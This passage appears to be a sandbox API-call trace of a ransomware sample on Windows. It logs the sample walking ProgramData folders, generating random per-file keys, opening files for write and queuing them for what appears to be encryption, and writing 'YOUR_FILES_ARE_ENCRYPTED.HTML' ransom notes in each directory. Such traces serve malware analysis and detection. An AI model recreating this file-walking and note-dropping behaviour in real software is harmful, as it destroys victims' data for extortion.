[0156.635] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="DA") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="29") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="CD") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: 
param_1="30") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="E7") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="1B") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="47") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="41") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="25") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="01") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="12") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="7D") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="81") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="58") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="53") returned 2 [0156.636] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" [0156.636] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.636] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0156.637] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0x91126ab0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x91126ab0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x91126ab0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xca6, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", cAlternateFileName="MICROS~1.XML")) returned 1 [0156.637] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml") returned 129 [0156.637] lstrcmpW (lpString1="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.637] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml") returned=".xml" [0156.637] lstrlenW (lpString=".xml") returned 4 [0156.637] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml") returned=".xml" [0156.637] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.637] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0156.638] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=3238) returned 1 [0156.638] GetProcessHeap () returned 0x270000 [0156.638] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0156.651] wsprintfW (in: 
param_1=0x4ebda36, param_2="%02X" | out: param_1="09") returned 2 [0156.651] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="67") returned 2 [0156.651] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="09") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="08") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="34") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="C1") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="D3") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="46") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="BA") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="E9") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="CA") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="70") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="EE") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="F3") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="F6") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F1") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="EC") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="53") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="AA") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="5F") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="EE") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="B2") returned 2 
[0156.652] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="17") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="FA") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="77") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="F7") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="7D") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="62") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="52") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="E2") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="D6") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="0E") returned 2 [0156.653] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" [0156.653] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.653] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0156.655] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95bd5cf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x95bd5cf0, 
ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa8ea310, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x1b826, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="msoutilstat.etw.man", cAlternateFileName="MSOUTI~1.MAN")) returned 1 [0156.655] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man") returned 98 [0156.655] lstrcmpW (lpString1="msoutilstat.etw.man", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.655] PathFindExtensionW (pszPath="msoutilstat.etw.man") returned=".man" [0156.655] lstrlenW (lpString=".man") returned 4 [0156.655] PathFindExtensionW (pszPath="msoutilstat.etw.man") returned=".man" [0156.663] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x949fb7f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x949fb7f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac1041d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x9bddd, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="wordEtw.man", cAlternateFileName="")) returned 1 [0156.663] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man") returned 90 [0156.663] lstrcmpW (lpString1="wordEtw.man", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.663] PathFindExtensionW (pszPath="wordEtw.man") returned=".man" [0156.663] lstrlenW (lpString=".man") returned 4 [0156.663] PathFindExtensionW (pszPath="wordEtw.man") returned=".man" [0156.663] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0x949fb7f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x949fb7f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac1041d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x9bddd, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="wordEtw.man", cAlternateFileName="")) returned 0 [0156.663] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.664] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0156.664] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.664] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.666] CloseHandle (hObject=0x58c) returned 1 [0156.667] GetProcessHeap () returned 0x270000 [0156.667] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0156.674] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96130e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x96130e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0 [0156.674] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.675] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0156.675] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.675] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.677] CloseHandle (hObject=0x4a8) returned 1 [0156.677] GetProcessHeap () returned 0x270000 [0156.678] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0156.679] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Crypto", cAlternateFileName="")) returned 1 [0156.679] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto") returned 35 [0156.679] GetProcessHeap () returned 0x270000 [0156.679] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, 
Size=0x10000) returned 0x75e0048 [0156.681] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto" [0156.681] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*" [0156.681] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.681] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.682] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="DSS", cAlternateFileName="")) returned 1 [0156.682] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS") returned 39 [0156.682] GetProcessHeap () returned 0x270000 [0156.682] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.682] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS" [0156.682] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*" [0156.682] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.683] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e7177a, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.683] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0156.683] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys") returned 51 [0156.683] GetProcessHeap () returned 0x270000 [0156.683] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0156.683] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys" [0156.683] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*" [0156.683] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0156.683] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.683] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.683] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0156.684] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0156.684] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\machinekeys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.684] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0156.686] CloseHandle (hObject=0x598) returned 1 [0156.686] GetProcessHeap () returned 0x270000 [0156.687] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 
[0156.687] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 0 [0156.687] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.687] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0156.687] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.688] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.689] CloseHandle (hObject=0x58c) returned 1 [0156.690] GetProcessHeap () returned 0x270000 [0156.690] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.690] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e7177a, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6cd9442c, ftLastWriteTime.dwHighDateTime=0x1ca0427, 
